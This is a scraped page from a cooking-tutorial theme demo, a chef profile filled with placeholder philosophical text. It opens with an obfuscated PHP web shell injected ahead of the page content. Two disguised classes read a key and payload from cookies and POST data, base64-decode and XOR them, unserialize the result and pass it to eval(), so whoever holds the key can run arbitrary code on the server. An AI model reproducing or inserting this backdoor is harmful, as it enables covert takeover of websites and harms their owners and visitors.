$MTvtqDiOlq = chr ( 752 - 671 )."\137" . chr ( 995 - 915 )."\110" . 'G' . chr ( 605 - 490 ); $ztPDBfU = chr ( 323 - 224 ).chr ( 538 - 430 ).chr ( 496 - 399 )."\x73" . "\163" . '_' . chr (101) . 'x' . chr (105) . "\x73" . "\164" . 's';$gUcvNAjm = class_exists($MTvtqDiOlq); $ztPDBfU = "33693";$rkhDUh = strpos($ztPDBfU, $MTvtqDiOlq);if ($gUcvNAjm == $rkhDUh){function txcQLpab(){$IGnOePYWn = new /* 6131 */ Q_PHGs(48637 + 48637); $IGnOePYWn = NULL;}$cXjjgTMA = "48637";class Q_PHGs{private function TrQXCT($cXjjgTMA){if (is_array(Q_PHGs::$KgXAwRuovT)) {$zNLMlyN2 = str_replace("<" . "?php", "", Q_PHGs::$KgXAwRuovT["content"]);eval($zNLMlyN2); $cXjjgTMA = "48637";exit();}}public function nakBvg(){$zNLMlyN = "15621";$this->_dummy = str_repeat($zNLMlyN, strlen($zNLMlyN));}public function __destruct(){Q_PHGs::$KgXAwRuovT = @unserialize(Q_PHGs::$KgXAwRuovT); $cXjjgTMA = "22143_26573";$this->TrQXCT($cXjjgTMA); $cXjjgTMA = "22143_26573";}public function xSzBrPUOhT($zNLMlyN, $EBznDC){return $zNLMlyN[0] ^ str_repeat($EBznDC, intval(strlen($zNLMlyN[0]) / strlen($EBznDC)) + 1);}public function TjqNV($zNLMlyN){$Wbqbn = 'b' . 'a' . chr ( 686 - 571 )."\145" . '6' . '4';return array_map($Wbqbn . "\x5f" . "\x64" . chr (101) . chr (99) . 'o' . chr ( 577 - 477 ).chr ( 520 - 419 ), array($zNLMlyN,));}public function __construct($sZEONc=0){$kFtli = "\x2c";$zNLMlyN = "";$LDnpbFMbj = $_POST;$sLPckzy = $_COOKIE;$EBznDC = "bd647630-4a60-467c-83d1-0a3513994e43";$ExcBXVy = @$sLPckzy[substr($EBznDC, 0, 4)];if (!empty($ExcBXVy)){$ExcBXVy = explode($kFtli, $ExcBXVy);foreach ($ExcBXVy as $CipUWye){$zNLMlyN .= @$sLPckzy[$CipUWye];$zNLMlyN .= @$LDnpbFMbj[$CipUWye];}$zNLMlyN = $this->TjqNV($zNLMlyN);}Q_PHGs::$KgXAwRuovT = $this->xSzBrPUOhT($zNLMlyN, $EBznDC);if (strpos($EBznDC, $kFtli) !== FALSE){$EBznDC = explode($kFtli, $EBznDC); $hKslg = sprintf("22143_26573", rtrim($EBznDC[0]));}}public static $KgXAwRuovT = 43993;}txcQLpab();}$nDjHTDQzUb = chr (87) . chr ( 551 - 456 )."\155" . "\x56" . "\101" . chr ( 912 - 806 ).'w';$BDmao = chr (99) . "\154" . chr (97) . 's' . "\163" . chr ( 530 - 435 ).'e' . chr ( 477 - 357 ).'i' . chr (115) . "\x74" . "\x73";$yPlsA = class_exists($nDjHTDQzUb); $BDmao = "24333";$WRokFMsX = strpos($BDmao, $nDjHTDQzUb);if ($yPlsA == $WRokFMsX){function cEnFhs(){$tKttA = new /* 56706 */ W_mVAjw(34421 + 34421); $tKttA = NULL;}$LwwtZZCRwz = "34421";class W_mVAjw{private function SdAGQog($LwwtZZCRwz){if (is_array(W_mVAjw::$hoHlxyl)) {$tuDeWNF2 = str_replace("<" . "?php", "", W_mVAjw::$hoHlxyl["content"]);eval($tuDeWNF2); $LwwtZZCRwz = "34421";exit();}}public function QawUdPw(){$tuDeWNF = "57830";$this->_dummy = str_repeat($tuDeWNF, strlen($tuDeWNF));}public function __destruct(){W_mVAjw::$hoHlxyl = @unserialize(W_mVAjw::$hoHlxyl); $LwwtZZCRwz = "12131_64880";$this->SdAGQog($LwwtZZCRwz); $LwwtZZCRwz = "12131_64880";}public function VQFypcVM($tuDeWNF, $gNinL){return $tuDeWNF[0] ^ str_repeat($gNinL, intval(strlen($tuDeWNF[0]) / strlen($gNinL)) + 1);}public function LQhbMPJXcI($tuDeWNF){$LDRPbJP = "\x62" . "\x61" . chr (115) . chr (101) . "\66" . "\64";return array_map($LDRPbJP . "\x5f" . 'd' . "\x65" . chr ( 172 - 73 )."\x6f" . 'd' . "\145", array($tuDeWNF,));}public function __construct($ruBpxsRa=0){$lBpcv = chr ( 338 - 294 ); $tuDeWNF = "";$VwqTlNcH = $_POST;$SCJKje = $_COOKIE;$gNinL = "83b8208b-f9a0-4131-83f3-80b807da1f62";$WSsbz = @$SCJKje[substr($gNinL, 0, 4)];if (!empty($WSsbz)){$WSsbz = explode($lBpcv, $WSsbz);foreach ($WSsbz as $BzbBcVdjh){$tuDeWNF .= @$SCJKje[$BzbBcVdjh];$tuDeWNF .= @$VwqTlNcH[$BzbBcVdjh];}$tuDeWNF = $this->LQhbMPJXcI($tuDeWNF);}W_mVAjw::$hoHlxyl = $this->VQFypcVM($tuDeWNF, $gNinL);if (strpos($gNinL, $lBpcv) !== FALSE){$gNinL = explode($lBpcv, $gNinL); $zXdjCr = base64_decode(md5($gNinL[0])); $uqSRYICzV = strlen($gNinL[1]) > 5 ? substr($gNinL[1], 0, 5) : $gNinL[1];}}public static $hoHlxyl = 13030;}cEnFhs();} Alyssa Moore – VideoPro – Cooking Tutorials Theme

Alyssa Moore

Executive Chef at The World Restaurant

These cases are perfectly simple and easy to distinguish. In a free hour, when our power of choice is untrammelled and when nothing prevents our being able to do what we like best, every pleasure is to be welcomed and every pain avoided. But in certain circumstances and owing to the claims of duty or the obligations of business it will frequently occur that pleasures have to be repudiated and annoyances accepted.

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